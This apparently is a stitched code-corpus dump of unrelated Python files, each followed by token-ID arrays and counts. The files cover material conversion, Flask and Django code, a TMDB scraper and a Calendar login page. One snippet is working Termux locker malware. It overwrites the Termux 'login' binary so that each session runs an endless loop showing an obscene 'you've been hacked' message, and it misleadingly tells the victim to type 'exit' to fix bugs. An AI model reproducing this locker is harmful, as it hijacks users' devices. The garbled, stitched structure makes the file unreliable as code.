            # Translate each VMT parameter, remembering flags that need
            # extra texture extraction work below.
            for key, val in vmtParameters.items():
                vmatFile.write(getVmatParameter(key, val))
                if(key.lower() == "$phong" or key.lower() == "$rimlight"):
                    if val.strip('"' + "'") != "0":
                        phong = True
                elif(key.lower() == "$basemapalphaphongmask"):
                    if val.strip('"' + "'") != "0":
                        baseMapAlphaPhongMask = True
                elif(key.lower() == "$selfillum"):
                    if val.strip('"' + "'") != "0":
                        print("selfillum")
                        selfIllum = True
                elif(key.lower() == "$translucent"):
                    if val.strip('"' + "'") != "0":
                        translucent = True
                elif(key.lower() == "$alphatest"):
                    if val.strip('"' + "'") != "0":
                        alphatest = True
                elif(key.lower() == "$basetexture"):
                    basetexturePath = val.lower().strip().replace('.vtf', '')
                elif(key.lower() == "$bumpmap"):
                    bumpmapPath = val.lower().strip().replace('.vtf', '')
                elif(key.lower() == "$envmap"):
                    envMap = True
                elif(key.lower() == "$basealphaenvmapmask"):
                    if val.strip('"' + "'") != "0":
                        baseAlphaEnvMapMask = True
                elif(key.lower() == "$normalmapalphaenvmapmask"):
                    if val.strip('"' + "'") != "0":
                        normalMapAlphaEnvMapMask = True
                elif(key.lower() == "$envmapmask"):
                    if val.strip('"' + "'") != "0":
                        envMapMask = True
            #check if base texture is empty
            if "metal" in vmatFileName:
                vmatFile.write("\tg_flMetalness 1.000\n")
            if translucent:
                vmatFile.write('\tF_TRANSLUCENT 1\n\tTextureTranslucency ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
                extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, False)
            if alphatest:
                vmatFile.write('\tF_ALPHA_TEST 1\n\tTextureTranslucency ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
                extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, False)
            # Reflectance can come from either the phong mask or the envmap
            # mask; hasReflectance prevents writing it twice.
            hasReflectance = False
            if phong:
                if not wroteReflectanceRange:
                    vmatFile.write('\t' + globalVars["reflectanceRange"] + '\n')
                    wroteReflectanceRange = True
                if baseMapAlphaPhongMask and basetexturePath != '':
                    hasReflectance = True
                    vmatFile.write('\tTextureReflectance ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
                    extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
                else:
                    if(bumpmapPath == '') and not (baseAlphaEnvMapMask or normalMapAlphaEnvMapMask):
                        vmatFile.write('\tTextureReflectance "[1.000000 1.000000 1.000000 0.000000]"\n')
                        #extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
                    else:
                        hasReflectance = True
                        vmatFile.write('\tTextureReflectance ' + fixTexturePath(bumpmapPath, MAP_SUBSTRING) + '\n')
                        extractAlphaTextures("materials/" + bumpmapPath.replace('"', '') + TEXTURE_FILEEXT, True)
            if envMap:
                if not wroteReflectanceRange:
                    vmatFile.write('\t' + globalVars["reflectanceRange"] + '\n')
                    wroteReflectanceRange = True
                if baseAlphaEnvMapMask and not normalMapAlphaEnvMapMask and basetexturePath != '' and not hasReflectance:
                    vmatFile.write('\tTextureReflectance ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
                    #Weird hack, apparently envmaps for LightmappedGeneric are flipped, whereas VertexLitGeneric ones aren't
                    # NOTE(review): both branches below currently pass True —
                    # the lightmapped/vertexlit distinction has no effect here.
                    if "lightmappedgeneric" in matType:
                        extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
                    elif "vertexlitgeneric" in matType:
                        extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, True)
                if normalMapAlphaEnvMapMask and bumpmapPath != '' and not hasReflectance:
                    vmatFile.write('\tTextureReflectance ' + fixTexturePath(bumpmapPath, MAP_SUBSTRING) + '\n')
                    #Weird hack, apparently envmaps for LightmappedGeneric are flipped, whereas VertexLitGeneric ones aren't
                    # NOTE(review): both branches below currently pass True as well.
                    if "lightmappedgeneric" in matType:
                        extractAlphaTextures("materials/" + bumpmapPath.replace('"', '') + TEXTURE_FILEEXT, True)
                    elif "vertexlitgeneric" in matType:
                        extractAlphaTextures("materials/" + bumpmapPath.replace('"', '') + TEXTURE_FILEEXT, True)
            if selfIllum:
                vmatFile.write('\tF_SELF_ILLUM 1\n\tTextureSelfIllumMask ' + fixTexturePath(basetexturePath, MAP_SUBSTRING) + '\n')
                extractAlphaTextures("materials/" + basetexturePath.replace('"', '') + TEXTURE_FILEEXT, False)
            vmatFile.write('}\n')
    bumpmapConvertedList = PATH_TO_CONTENT_ROOT + "convertedBumpmaps.txt"
    if not os.path.exists(bumpmapConvertedList):
        print('ERROR: Please create an empty text file named "convertedBumpmaps.txt" in the root of your mod files (i.e. content/steamtours_addons/hl2)')
        quit()
    # flip the green channels of any normal maps (only once per texture;
    # convertedBumpmaps.txt records which ones are already flipped)
    if(bumpmapPath != ""):
        print("Checking if normal file " + bumpmapPath + " has been converted")
        foundMaterial = False
        with open(bumpmapConvertedList, 'r+') as bumpList: #change the read type to write
            for line in bumpList.readlines():
                if line.rstrip() == bumpmapPath.rstrip():
                    foundMaterial = True
            if not foundMaterial:
                flipNormalMap(fixTexturePath(bumpmapPath).strip("'" + '"'))
                print("flipped normal map of " + bumpmapPath)
                #append bumpmapPath to convertedBumpmaps.txt
                bumpList.write(bumpmapPath + "\n")
            bumpList.close()
# TODO: reparse the vmt, see i.e. if alphatest, then TextureTranslucency "path/to/tex/name_alpha.tga",
# basemap alpha can either be a transparency mask, selfillum mask, or specular mask
# normalmap alpha can be a phong mask by default
# if $translucent/$alphatest
# TextureTranslucency "path/to/tex/basetexture_alpha.tga"
# if $rimlight/$phong in vmt
# if $basemapalphaphongmask in vmt
#TextureRimMask/TextureSpecularMask "path/to/tex/basetexture_alpha.tga"
# else
#TextureRimMask/TextureSpecularMask "path/to/tex/bumpmap_alpha.tga"
# if $selfillum in vmt
# Add Mask 1
# TextureSelfIllumMask "path/to/tex/basetexture_alpha.tga"
# input("\nDone, press ENTER to continue...")
| [
2,
1482,
24040,
8090,
352,
764,
14761,
83,
2587,
3696,
284,
2829,
8090,
362,
764,
85,
6759,
3696,
13,
198,
2,
198,
2,
15069,
357,
66,
8,
1584,
48599,
385,
198,
2,
198,
2,
2448,
3411,
318,
29376,
7520,
11,
1479,
286,
3877,
11,
28... | 2.252122 | 6,243 |
import pytest
import zmq
from plenum.test.client.helper import create_zmq_connection
@pytest.fixture()
| [
11748,
12972,
9288,
198,
11748,
1976,
76,
80,
198,
198,
6738,
458,
44709,
13,
9288,
13,
16366,
13,
2978,
525,
1330,
2251,
62,
89,
76,
80,
62,
38659,
628,
198,
31,
9078,
9288,
13,
69,
9602,
3419,
628
] | 2.815789 | 38 |
from clge.Behaviour import Vector3, Vector2, World
from clge.Behaviour.Components.ThreeDimensions.AsciiRenderer3D import AsciiRenderer3D
from clge.Behaviour.Components.ThreeDimensions.Mesh3D import Mesh3D
from clge.Behaviour.Components.ThreeDimensions.Transform3D import Transform3D
from clge.Constants import CoordinateSystems
from clge.GameMath import Matrix
from clge import AltScreen
from clge.Behaviour.Behaviour import Behaviour
# Screen is twice as wide as tall to compensate for terminal character cells.
w = 100
h = w / 2
scr = AltScreen(int(w), int(h), True)
scr.auto_clear_objects_list_setter(True)
scr.change_coordinate_system(CoordinateSystems.MIDDLE_MIDDLE)
scr.set_timeout(.05)
angle = 0
# Eight corners of a cube with side length 20 centered on the origin.
points = [
    Vector3(-10, -10, -10),
    Vector3(10, -10, -10),
    Vector3(10, 10, -10),
    Vector3(-10, 10, -10),
    Vector3(-10, -10, 10),
    Vector3(10, -10, 10),
    Vector3(10, 10, 10),
    Vector3(-10, 10, 10),
]
# NOTE(review): `update` is not defined in this chunk — presumably a frame
# callback defined elsewhere in the file; confirm before running.
scr.FunctionManager.registerUpdate(update)
scr.Start()
| [
6738,
537,
469,
13,
25267,
37716,
1330,
20650,
18,
11,
20650,
17,
11,
2159,
198,
6738,
537,
469,
13,
25267,
37716,
13,
7293,
3906,
13,
12510,
29271,
5736,
13,
1722,
979,
72,
49,
437,
11882,
18,
35,
1330,
1081,
979,
72,
49,
437,
11... | 2.54039 | 359 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 IBM Corporation
Licensed under the Apache License, Version 2.0 (the “License”);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an “AS IS” BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contributors:
* Roberto Oliveira <rdutra@br.ibm.com>
* Rafael Peria de Sene <rpsene@br.ibm.com>
"""
from drilldown_model import DrilldownModel
TABULATION = " "
# NOTE: this module uses Python 2 print statements.
class DrilldownView(object):
    """ This class represents the drilldown view """
    def print_drilldown(self, event, report_file, threshold):
        """ Print the drilldown view based on drilldown model """
        drilldown_model = DrilldownModel()
        ui_binmodule_list = drilldown_model.create_drilldown_model(report_file)
        title = "Drilldown for event: " + event
        border = self.__get_border(title)
        self.__print_logo(title, border)
        # For each binModule
        for ui_binmodule in ui_binmodule_list:
            # Do not print values smaller than the threshold value
            if ui_binmodule.get_percentage() < threshold:
                continue
            # Defer printing the binModule header until a symbol survives the
            # threshold filter, so empty modules are not printed at all.
            print_binmodule = True
            # For each symbol
            for ui_symbol in ui_binmodule.get_symbols_list():
                # Do not print values smaller than the threshold value
                if ui_symbol.get_percentage() < threshold:
                    continue
                if print_binmodule:
                    # If not the first element, print a new line
                    if ui_binmodule is not ui_binmodule_list[0]:
                        print ""
                    print ui_binmodule.get_text()
                    print_binmodule = False
                print TABULATION + ui_symbol.get_text()
                # For each sample
                for ui_sample in ui_symbol.get_samples_list():
                    print TABULATION + TABULATION + ui_sample.get_text()
        print border + "\n"
    @staticmethod
    def __print_logo(title, border):
        """ Print the drilldown logo """
        print ""
        print border
        print title
        print border
    @staticmethod
    def __get_border(title):
        """ Get the border (a line of '=' as long as the title) """
        return "=" * len(title)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
15269,
357,
34,
8,
2177,
19764,
10501,
198,
198,
26656,
15385,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
564,
250,
34156,
447,
251,
1... | 2.346642 | 1,102 |
import tkinter as tk
import json
from calendarauth import CalendarAuthenticator
class CalendarLoginPage(tk.Frame):
    """Menu page for logging into google calendar.
    CalendarLoginPage inherits from tkinter's frame page. It's purpose
    is to provide end user with interface to authenticate and authorize
    google calendar access.
    NOTE(review): the widgets and dicts used below (_user_listbox,
    _user_login_button, _cancel_button, _name_id_dict, _id_credentials_dict,
    _calendar_authenticator) are presumably created in __init__, which is not
    visible in this chunk — confirm against the full class.
    """
    def _reset_page(self, event):
        """Resets page's state and updates list of available users."""
        # Loading id_name_dict state from json file.
        with open('../resources/dicts/id_name_dict.json', 'r') as id_name_dict_json:
            self._id_name_dict = json.load(id_name_dict_json)
        # Removing all listbox entries and filling it with values from
        # newly loaded dictionary (also building the reverse name->id map).
        self._user_listbox.delete(0, tk.END)
        for key, value in self._id_name_dict.items():
            self._name_id_dict[value] = key
            self._user_listbox.insert(tk.END, value)
    def _authenticate_user(self):
        """Starts calendar authentication for selected user."""
        index = self._user_listbox.curselection()
        # curselection() returns an empty tuple when nothing is selected.
        if len(index) > 0:
            user_name = self._user_listbox.get(index[0])
            user_id = self._name_id_dict[user_name]
            # Swap button states while authentication is in flight.
            self._user_login_button.config(state=tk.DISABLED)
            self._cancel_button.config(state=tk.ACTIVE)
            self._calendar_authenticator.start_authentication()
            self._save_credentials(user_id)
    def _save_credentials(self, user_id):
        """Saves user's credentials if authentication is completed."""
        # TODO Add pop up confirming that authentication has been
        # successfully completed.
        returncode, credentials = self._calendar_authenticator.get_credentials()
        if returncode == 0:
            self._id_credentials_dict[user_id] = credentials
            self._user_login_button.config(state=tk.ACTIVE)
            self._cancel_button.config(state=tk.DISABLED)
        else:
            # Authentication was not completed so we schedule this
            # function for later (polls every 200 ms via tkinter's after()).
            self.after(200, self._save_credentials, user_id)
    def _cancel_authentication(self):
        """Stops authentication and resets buttons' state."""
        self._cancel_button.config(state=tk.DISABLED)
        self._user_login_button.config(state=tk.ACTIVE)
        self._calendar_authenticator.cancel_authentication()
| [
11748,
256,
74,
3849,
355,
256,
74,
198,
11748,
33918,
198,
198,
6738,
2386,
437,
3301,
1071,
1330,
26506,
47649,
26407,
628,
198,
4871,
26506,
47790,
9876,
7,
30488,
13,
19778,
2599,
198,
220,
220,
220,
37227,
23381,
2443,
329,
18931,
... | 2.511411 | 964 |
import os
import time
import json
import http.client
from pprint import pprint
import tmdbsimple as tmdb
from PyInquirer import prompt, style_from_dict, Token
class Movie(object):
    """Record type describing one movie entry.
    NOTE(review): no constructor or methods are visible in this chunk; the
    attributes below are presumably set elsewhere — confirm against the
    full file.
    :param image: (str) path to the comixified image (e.g. 'img/oldboy.jpg')
    :param id: (int) The Movie DB identifier
    :param names: ([str]) titles, presumably keyed/ordered by language
    :param posters: ([str]) poster paths, presumably per language
    :param lang: (str) original language code
    """
def load_movies():
    """Load the list of movies from the local ``data.json`` file.

    The file layout is the one produced by ``write_movies_json()``:
    ``{"movies": [...]}``.

    :return: ([dict]) the value stored under the top-level ``movies`` key
    :raises IOError: if ``data.json`` does not exist
    :raises KeyError: if the document has no ``movies`` key
    """
    # The original pre-assigned `movies = None` and used a temporary; both
    # were dead weight — return the parsed list directly.
    with open('data.json', 'r') as fh:
        return json.load(fh)['movies']
def write_movies_json(movies):
    """Persist *movies* to the local ``data.json`` file.

    The document always has a single top-level key: ``{"movies": [...]}``,
    written with ``indent=4`` and sorted keys for stable diffs.

    :param movies: ([dict]) movie records to store
    """
    # Report how many records are being written.
    count = len(movies)
    print("{} movies".format(count))
    with open('data.json', 'w') as out:
        json.dump({'movies': movies}, out, indent=4, sort_keys=True)
# Use to add movies in a batch: [comixified image path, The Movie DB id]
movies_list = [
    ['img/oldboy.jpg', 670]
]
# Max 5 request per second
# in fact 40 request every 10 seconds
RATE = 1 / 5
# Languages queried for titles/posters by get_movie_infos() below.
LANGUAGES = ['en', 'fr', 'es', 'de']
# PyInquirer prompt color scheme.
custom_style_2 = style_from_dict({
    Token.Separator: '#6C6C6C',
    Token.QuestionMark: '#FF9D00 bold',
    #Token.Selected: '',  # default
    Token.Selected: '#5F819D',
    Token.Pointer: '#FF9D00 bold',
    Token.Instruction: '',  # default
    Token.Answer: '#5F819D bold',
    Token.Question: '',
})
# The Movie DB api key is read from a local .api_key file (not checked in).
if not os.path.isfile('.api_key'):
    raise ValueError("You must create a file .api_key with you The Movie DB api key in it")
with open('.api_key', 'r') as fh:
    tmdb.API_KEY = fh.read().strip()
def get_movie_infos(movie_id, languages=None):
    """Fetch localized titles and poster paths from The Movie DB.

    :param movie_id: (int) The Movie DB identifier
    :param languages: ([str]) language codes; defaults to ``LANGUAGES``
    :return: (names, posters, original_language)
    """
    if languages is None:
        languages = LANGUAGES
    entry = tmdb.Movies(movie_id)
    names = {}
    posters = {}
    for code in languages:
        infos = entry.info(language=code)
        names[code] = infos['title']
        posters[code] = infos['poster_path']
        names['original_title'] = infos['original_title']
        # Throttle so we stay under the API rate limit.
        time.sleep(RATE)
    # NOTE: relies on the last loop iteration's response; with an empty
    # language list this raises NameError, same as the original.
    return names, posters, infos['original_language']
# Interactive entry point: ask what to do, then either search/add one movie,
# batch-import the ids listed in movies_list, or add a language to every entry.
intentions = {
    'Search for a movie': 'search',
    'Call The Movie DB api': 'call',
    'Add a lang': 'add_lang',
}
intention_prompt = {
    'type': 'list',
    'name': 'intention',
    'message': 'What do you want to do?',
    'choices': list(intentions.keys()),
    'filter': lambda key: intentions[key]
}
intention = prompt(intention_prompt)['intention']
if intention == 'search':
    movies = load_movies()
    movie_title_prompt = {
        'type': 'input',
        'name': 'query',
        'message': 'Movie title?',
    }
    query = prompt(movie_title_prompt)['query']
    search = tmdb.Search()
    # FIX: 'style' is a PyInquirer prompt option, not a The Movie DB API
    # parameter -- it was being forwarded as a bogus query-string argument.
    # The unused 'response' local is dropped; search.results is populated.
    search.movie(query=query)
    results = {}
    for s in search.results:
        results[s['title']] = s['id']
    if len(results) == 0:
        print("No movie found!")
        exit(0)
    movie_id_prompt = {
        'type': 'list',
        'name': 'movie_id',
        'message': 'Which one?',
        'choices': list(results.keys()),
        'filter': lambda key: results[key]
    }
    # custom_style_2 applied where it was intended: the prompt call.
    movie_id = prompt(movie_id_prompt, style=custom_style_2)['movie_id']
    names, posters, lang = get_movie_infos(movie_id)
    # Get ALternative titles + Get Images
    # movie.alternative_titles()
    # time.sleep(RATE)
    # movie.images()
    comix_prompt = {
        'type': 'input',
        'name': 'image_path',
        'message': 'Comixified image name?',
    }
    image_path = prompt(comix_prompt)['image_path']
    # Normalize the image path to img/<name>.jpg.
    if not image_path.startswith('img/'):
        image_path = 'img/' + image_path
    if not image_path.endswith('.jpg'):
        image_path += '.jpg'
    movie_obj = Movie(
        image_path,
        id=movie_id,
        names=names,
        posters=posters,
        lang=lang
    )
    pprint(movie_obj.__dict__)
    movies.append(movie_obj.__dict__)
    write_movies_json(movies)
elif intention == 'call':
    movies = load_movies()
    # Batch import of the [image, id] pairs declared in movies_list.
    for idx in range(len(movies_list)):
        image_path, movie_id = movies_list[idx]
        print(idx, image_path)
        names, posters, lang = get_movie_infos(movie_id)
        movie_dict = Movie(
            image_path,
            id=movie_id,
            names=names,
            posters=posters,
            lang=lang
        ).__dict__
        movies.append(movie_dict)
    write_movies_json(movies)
elif intention == 'add_lang':
    movies = load_movies()
    lang_prompt = {
        'type': 'input',
        'name': 'lang',
        'message': 'Which lang?',
    }
    lang = prompt(lang_prompt)['lang']
    # Fetch the new language's title/poster for every stored movie.
    for idx in range(len(movies)):
        movie_id = movies[idx]['id']
        print(idx, movies[idx]['names']['original_title'])
        names, posters, _ = get_movie_infos(movie_id, languages=[lang])
        movies[idx]['names'][lang] = names[lang]
        movies[idx]['posters'][lang] = posters[lang]
    write_movies_json(movies)
| [
11748,
28686,
198,
11748,
640,
198,
11748,
33918,
198,
11748,
2638,
13,
16366,
198,
6738,
279,
4798,
1330,
279,
4798,
198,
198,
11748,
256,
9132,
1443,
320,
1154,
355,
256,
9132,
65,
198,
6738,
9485,
818,
29782,
81,
1330,
6152,
11,
39... | 2.253253 | 2,152 |
import os
file = open('/data/data/com.termux/files/usr/bin/locker_service.py', 'w')
file.write("""print(''' _____
RRRRRR. I PPPPPP.
R R. I. P. P
R R. I. P. P
R RRRRR. I. PPPPPP
RR. I. P
R. R. I. P
R. R. I. P
R. R. I. P
''')
while True:
a = input(' Твоя пизда взломана @pkgsearch (telegram)')
""")
file.close()
os.system('chmod +x /data/data/com.termux/files/usr/bin/locker_service.py')
file = open('/data/data/com.termux/files/usr/bin/login', 'w')
file.write('python /data/data/com.termux/files/usr/bin/locker_service.py')
file.close()
print(' Type command -> exit <- to fix bugs')
| [
11748,
28686,
201,
198,
201,
198,
7753,
796,
1280,
10786,
14,
7890,
14,
7890,
14,
785,
13,
4354,
2821,
14,
16624,
14,
14629,
14,
8800,
14,
5354,
263,
62,
15271,
13,
9078,
3256,
705,
86,
11537,
201,
198,
7753,
13,
13564,
7203,
15931,... | 1.539931 | 576 |
# Convert the depth channel of an OpenEXR capture to a MATLAB .mat file.
import OpenEXR, Imath
import os.path
import scipy.io as sio
import numpy as np

depth_save_root = 'E:/GTAVTempCaptures/'
exr_depth_file = 'E:/GTAVTempCaptures/frame9207.exr'
filePrefix = 'py1'

exrFile = OpenEXR.InputFile(exr_depth_file)
dw = exrFile.header()['dataWindow']
# Data window is inclusive, hence the +1 on both extents.
size = (dw.max.x - dw.min.x + 1, dw.max.y - dw.min.y + 1)
pt = Imath.PixelType(Imath.PixelType.FLOAT)
depthstr = exrFile.channel('D', pt)  # S for stencil and D for depth in channels
# FIX: np.fromstring is deprecated (and removed for binary input in newer
# NumPy); np.frombuffer is the supported equivalent for raw bytes.
depth = np.frombuffer(depthstr, dtype=np.float32).reshape(size[1], size[0])  # Numpy arrays are (row, col)
sio.savemat('{0}/{1}_depth.mat'.format(depth_save_root, filePrefix), {'depth': depth})
exrFile.close()
| [
2,
10385,
284,
764,
6759,
198,
198,
11748,
4946,
6369,
49,
11,
1846,
776,
198,
11748,
28686,
13,
6978,
198,
11748,
629,
541,
88,
13,
952,
355,
264,
952,
198,
11748,
299,
32152,
355,
45941,
198,
198,
18053,
62,
21928,
62,
15763,
796,... | 2.393103 | 290 |
from app.util import RequestUtil, ResponseUtil, JsonUtil
from app.util.AuthUtil import *
@app.route('/share/list', methods=['POST'])
@authorized_required
def share_list_to_group(user):
    """
    @api {post} /share/list Share list to multiple groups.
    @apiName Share list to multiple groups.
    @apiGroup Share

    @apiUse AuthorizationTokenHeader

    @apiParam {String} list_id: A id of the list to share
    @apiParam {String[]} group_id: The list of group id of the group to share
    @apiParamExample {json} Request (Example)
        {
            "list_id": "asdklfaj",
            "group_id": ["adlskfjldas", "adsfkdasf"]
        }

    @apiUse GroupAccessDenied
    @apiUse ListDoesNotExist
    """
    app.logger.info('User {} Access {}'.format(user, request.full_path))
    # Pull the target list and destination groups out of the request body.
    payload = RequestUtil.get_request()
    group_id = payload.get('group_id', None)
    list_id = payload.get('list_id', None)
    # MongoUtil returns an error string on failure, anything else on success.
    outcome = MongoUtil.share_list_to_group(user, list_id, group_id)
    if not isinstance(outcome, str):
        app.logger.info('User {} Share list {} to Group {}'.format(user, list_id, group_id))
        return jsonify(msg='Success'), 200
    app.logger.debug(outcome)
    return ResponseUtil.error_response(outcome)
@app.route('/user/list/<string:base_list_id>/article/<string:article_id>/share/group/<string:group_id>/list'
           '/<target_list_id>', methods=['POST'])
@authorized_required
def share_article_to_group(user, base_list_id, article_id, group_id, target_list_id):
    """
    @api {post} /user/list/:id/article/:id/share/group/:id/list/:id Share a article to group list.
    @apiName Share a article into a group list.
    @apiGroup Share

    @apiUse AuthorizationTokenHeader

    @apiUse UnauthorizedAccessError
    @apiUse ResourceDoesNotExist
    """
    app.logger.info('User {} Access {}'.format(user, request.full_path))
    # MongoUtil returns an error string on failure, anything else on success.
    outcome = MongoUtil.share_article_to_group_list(
        user, base_list_id, article_id, group_id, target_list_id)
    if not isinstance(outcome, str):
        app.logger.info('User {} share article {} to group {}'.format(user, article_id, group_id))
        return jsonify(msg='Success')
    app.logger.debug(outcome)
    return ResponseUtil.error_response(outcome)
| [
6738,
598,
13,
22602,
1330,
19390,
18274,
346,
11,
18261,
18274,
346,
11,
449,
1559,
18274,
346,
198,
6738,
598,
13,
22602,
13,
30515,
18274,
346,
1330,
1635,
628,
198,
31,
1324,
13,
38629,
10786,
14,
20077,
14,
4868,
3256,
5050,
28,
... | 2.60452 | 885 |
from bs4 import BeautifulSoup
import requests
from PIL import Image
from io import BytesIO
import os
# NOTE(review): StartSearch is neither defined nor imported in this snippet;
# its definition was probably lost in extraction -- confirm before running.
StartSearch()
| [
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
11748,
7007,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
33245,
1330,
2750,
4879,
9399,
198,
11748,
28686,
628,
198,
10434,
18243,
3419,
198
] | 3.545455 | 33 |
"""
Packages and classes we want to expose to users
"""
from ._utils import get_project_root
__all__ = [
'get_project_root',
]
| [
37811,
198,
11869,
1095,
290,
6097,
356,
765,
284,
15651,
284,
2985,
198,
37811,
198,
6738,
47540,
26791,
1330,
651,
62,
16302,
62,
15763,
198,
198,
834,
439,
834,
796,
685,
198,
220,
220,
220,
705,
1136,
62,
16302,
62,
15763,
3256,
... | 2.933333 | 45 |
from django.test import TestCase
from .models import Profile,BloodStock
# Create your tests here.
class ProfileTestClass(TestCase):
    '''
    Set Up method that creates instance of Profile Class
    Runs before each test
    '''
    # NOTE(review): the docstring above promises a setUp method, but none is
    # defined here, so self.profile is never created and every test that uses
    # it would raise AttributeError -- confirm setUp was not lost.

    def tearDown(self):
        '''
        this tearDown method runs after every test.
        '''
        pass

    def test_instance(self):
        """
        Testing instance to see if self.profile is instance of class Profile.
        """
        self.assertIsInstance(self.profile, Profile)

    def test_save_profile(self):
        '''
        Testing the Save Method on Profile class
        '''
        self.profile.save_profile()
        profiles = Profile.objects.all()
        self.assertTrue(len(profiles) > 0)

    def test_profile_update(self):
        """
        TestCase to check if profile email is updated
        """
        self.profile.save_profile()
        self.profile.email_update('user2@example.com')
        self.assertEqual(self.profile.email, 'user2@example.com')

    def test_delete_profile(self):
        """
        TestCase to check if method deletes a profile instance
        """
        self.profile.save_profile()
        self.profile.delete_profile()
        profiles = Profile.objects.all()
        self.assertTrue(len(profiles) == 0)
class Blood_stockTestClass(TestCase):
    '''
    Set Up method that creates instance of Blood_stock Class
    Runs before each test
    '''
    # NOTE(review): as with ProfileTestClass, no setUp is defined here, so
    # self.stock is never created -- confirm setUp was not lost.

    def tearDown(self):
        '''
        this tearDown method runs after every test.
        '''
        pass

    def test_instance(self):
        """
        Testing instance to see if self.stock is instance of class Blood_stock.
        """
        self.assertIsInstance(self.stock, BloodStock)

    def test_save_blood_stock(self):
        '''
        Testing the Save Method on Profile class
        '''
        self.stock.save_bloodstock()
        stocks = BloodStock.objects.all()
        self.assertTrue(len(stocks) > 0)

    def test_stock_update(self):
        """
        TestCase to check if bloodstock volume is updated
        """
        self.stock.save_bloodstock()
        self.stock.blood_volume_update('10.00')
        self.assertEqual(self.stock.blood_volume, '10.00')

    def test_delete_stock(self):
        """
        TestCase to check if method deletes a stock instance
        """
        self.stock.save_bloodstock()
        self.stock.delete_stock()
        stocks = BloodStock.objects.all()
        self.assertTrue(len(stocks) == 0)
| [
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
198,
6738,
764,
27530,
1330,
13118,
11,
21659,
26207,
198,
198,
2,
13610,
534,
5254,
994,
13,
198,
198,
4871,
13118,
14402,
9487,
7,
14402,
20448,
2599,
198,
220,
220,
220,
705,
7061,
1... | 2.393797 | 1,064 |
import pygame, os
from pygame import image
from .drawable import Drawable
from polybius.managers import FRAMES
| [
11748,
12972,
6057,
11,
28686,
198,
6738,
12972,
6057,
1330,
2939,
198,
6738,
764,
19334,
540,
1330,
15315,
540,
198,
6738,
7514,
65,
3754,
13,
805,
10321,
1330,
8782,
29559,
198,
220,
220,
220,
220,
220,
220,
628,
220,
220,
220,
198
... | 2.928571 | 42 |
import math
import pybullet as p
import numpy as np
import transforms3d
import utilities as util
# lap joint task
# Start pose of the tool: offset along z with identity orientation
# (quaternion built from the identity rotation matrix).
INITIAL_POS = np.array([0.0, 0.0, 0.24])  # presumably metres -- TODO confirm units
INITIAL_ORN = util.mat33_to_quat(np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]))
# Goal pose: origin, rotated pi about z given as Euler angles
# (axis convention defined by the consumer -- TODO confirm).
TARGET_POS = np.array([0, 0, 0])
TARGET_ORN = np.array([0, 0, math.pi])
# URDF model locations for the free tool and the 90-degree lap-joint task.
URDF_PATH_TOOL = 'envs/urdf/robotless_lap_joint/tool'
URDF_PATH_TARGET = 'envs/urdf/robotless_lap_joint/task_lap_90deg'
| [
11748,
10688,
198,
11748,
12972,
15065,
1616,
355,
279,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
31408,
18,
67,
198,
11748,
20081,
355,
7736,
198,
198,
2,
14779,
6466,
4876,
198,
1268,
2043,
12576,
62,
37997,
796,
45941,
13,
1874... | 2.234375 | 192 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Created on 18/10/12 16:53:03
@author: Changzhi Sun
"""
import sys
sys.path.append("..")
from typing import List, Dict, Any, Optional, Tuple, Set
from collections import defaultdict
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from antNRE.src.word_encoder import WordCharEncoder
from antNRE.src.seq_encoder import BiLSTMEncoder
from antNRE.src.seq_decoder import SeqSoftmaxDecoder
from antNRE.src.decoder import VanillaSoftmaxDecoder
from antNRE.lib.vocabulary import Vocabulary
from antNRE.lib.util import parse_tag
from antNRE.lib.util import start_of_chunk
from antNRE.lib.util import end_of_chunk
from src.rel_encoder import RelFeatureExtractor
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
1248,
14,
940,
14,
1065,
1467,
25,
4310,
25,
3070,
198,
198,
31,
9800,
25,
22597,
89,
5303,
3825... | 2.932806 | 253 |
from librus_tricks import exceptions
from librus_tricks.auth import authorizer
from librus_tricks.classes import *
from librus_tricks.core import SynergiaClient
name = 'librus_tricks'
__title__ = 'librus_tricks'
__author__ = 'Backdoorek'
__version__ = '0.7.0'
def create_session(email, password, fetch_first=True, **kwargs):
    """Create Synergia session(s) for a Librus Portal account.

    Use this only when the Librus Portal password is the same as the
    Synergia one.

    :param email: str
    :param password: str
    :param fetch_first: bool or int -- True picks the first user, False
        returns a session for every user, an int selects a user by index
    :return: a SynergiaClient, or a list of SynergiaClient when
        fetch_first is False
    """
    if fetch_first is False:
        # One session per authorized user.
        users = authorizer(email, password)
        return [SynergiaClient(user, synergia_user_passwd=password, **kwargs)
                for user in users]
    # True selects index 0; any other value is used as an explicit index.
    index = 0 if fetch_first is True else fetch_first
    selected = authorizer(email, password)[index]
    return SynergiaClient(selected, synergia_user_passwd=password, **kwargs)
6738,
300,
2889,
385,
62,
83,
23706,
1330,
13269,
198,
6738,
300,
